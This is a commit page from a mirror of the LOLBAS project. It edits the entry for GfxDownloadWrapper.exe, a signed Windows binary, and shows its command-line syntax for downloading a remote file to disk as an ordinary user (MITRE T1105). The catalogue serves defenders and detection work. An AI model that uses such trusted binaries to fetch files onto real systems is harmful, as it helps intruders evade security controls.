public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-10-23 00:58:42 +02:00
Code Issues Projects Releases Wiki Activity

Adjusted GfxDownloadWrapper

Browse Source
This commit is contained in:
Oddvar Moe 2020-01-07 09:08:13 +01:00
parent 71aec7465b
commit ecc94c2d09
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
yml/OSBinaries/GfxDownloadWrapper.yml
View File

@ -4,9 +4,9 @@ Description: Remote file download used by the Intel Graphics Control Panel, rece
Author: Jesus Galvez
Created: Jesus Galvez
Commands:
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "<URL>" "<DESTINATION FILE>"
Description: GfxDownloadWrapper.exe downloads the content that returns <URL> and writes it to the file <DESTINATION FILE PATH>. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
Usecase: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_5fc14233495bec91\GfxDownloadWrapper.exe "http://127.0.0.1:8005" "%temp%\test"
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
Usecase: Download file from internet
Category: Download
Privileges: User
MitreID: T1105